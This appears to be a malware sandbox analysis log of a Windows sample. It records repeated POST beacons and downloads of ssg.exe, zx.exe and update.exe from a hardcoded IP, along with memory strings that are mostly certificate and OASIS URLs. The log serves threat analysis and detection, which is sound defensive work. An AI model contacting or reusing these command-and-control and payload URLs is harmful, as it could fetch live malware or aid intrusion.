                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeCode function: 0_2_00007FF78531216C InternetOpenW,Sleep,InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetCloseHandle,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,GetProcessHeap,RtlAllocateHeap,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00007FF78531216C
                    Source: global trafficHTTP traffic detected: GET /ssg.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                    Source: global trafficHTTP traffic detected: GET /zx.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                    Source: global trafficHTTP traffic detected: GET /update.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                    Source: unknownHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                    Source: explorer.exe, 00000005.00000003.2297200352.000000000A34F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/ssg.exe
                    Source: explorer.exe, 00000005.00000003.2297200352.000000000A34F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/update.exe
                    Source: explorer.exe, 00000005.00000003.2297200352.000000000A34F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/zx.exe
                    Source: 4F82.tmp.zx.exe, 0000000C.00000003.1720842767.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714525061.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A74A8000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714317298.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714102710.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713929591.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1721815071.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A74AC000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713770843.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1722411328.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, _ctypes.pyd.12.dr, select.pyd.12.dr, _socket.pyd.12.dr, _hashlib.pyd.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: explorer.exe, 00000005.00000000.1535548358.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2793022789.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2284159201.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2289211042.000000000927A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1535548358.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2175043198.000000000926A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2794027195.000000000927B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: 4F82.tmp.zx.exe, 0000000C.00000003.1720842767.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714525061.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A74A8000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714317298.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714102710.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1720842767.00000121A74AC000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713929591.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1721815071.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A74AC000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713770843.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1722411328.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, _ctypes.pyd.12.dr, select.pyd.12.dr, _socket.pyd.12.dr, _hashlib.pyd.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: explorer.exe, 00000005.00000003.2289211042.000000000927A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1535548358.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2175043198.000000000926A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2794027195.000000000927B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ccert.coml07
                    Source: 4F82.tmp.zx.exe, 0000000C.00000003.1713559075.00000121A749F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                    Source: 4F82.tmp.zx.exe, 0000000C.00000003.1720842767.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714525061.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714317298.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714102710.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713929591.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1721815071.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713770843.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1722411328.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, _ctypes.pyd.12.dr, select.pyd.12.dr, _socket.pyd.12.dr, _hashlib.pyd.12.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                    Source: 4F82.tmp.zx.exe, 0000000C.00000003.1720842767.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714525061.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A74A8000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714317298.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714102710.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713929591.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1721815071.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A74AC000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713770843.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1722411328.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, _ctypes.pyd.12.dr, select.pyd.12.dr, _socket.pyd.12.dr, _hashlib.pyd.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: explorer.exe, 00000005.00000000.1535548358.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2793022789.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2284159201.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2289211042.000000000927A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1535548358.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2175043198.000000000926A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2794027195.000000000927B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: 4F82.tmp.zx.exe, 0000000C.00000003.1720842767.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714525061.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A74A8000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714317298.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714102710.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1720842767.00000121A74AC000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713929591.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1721815071.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A74AC000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713770843.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1722411328.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, _ctypes.pyd.12.dr, select.pyd.12.dr, _socket.pyd.12.dr, _hashlib.pyd.12.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: 4F82.tmp.zx.exe, 0000000C.00000003.1720842767.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714525061.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A74A8000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714317298.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714102710.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713929591.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1721815071.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A74AC000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713770843.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1722411328.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, _ctypes.pyd.12.dr, select.pyd.12.dr, _socket.pyd.12.dr, _hashlib.pyd.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: explorer.exe, 00000005.00000000.1535548358.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2793022789.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2793022789.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2284159201.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2289211042.000000000927A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1535548358.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2175043198.000000000926A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2284159201.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2794027195.000000000927B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1535548358.0000000009237000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: 4F82.tmp.zx.exe, 0000000C.00000003.1720842767.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714525061.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A74A8000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714317298.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714102710.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1720842767.00000121A74AC000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713929591.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1721815071.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A74AC000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713770843.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1722411328.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, _ctypes.pyd.12.dr, select.pyd.12.dr, _socket.pyd.12.dr, _hashlib.pyd.12.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
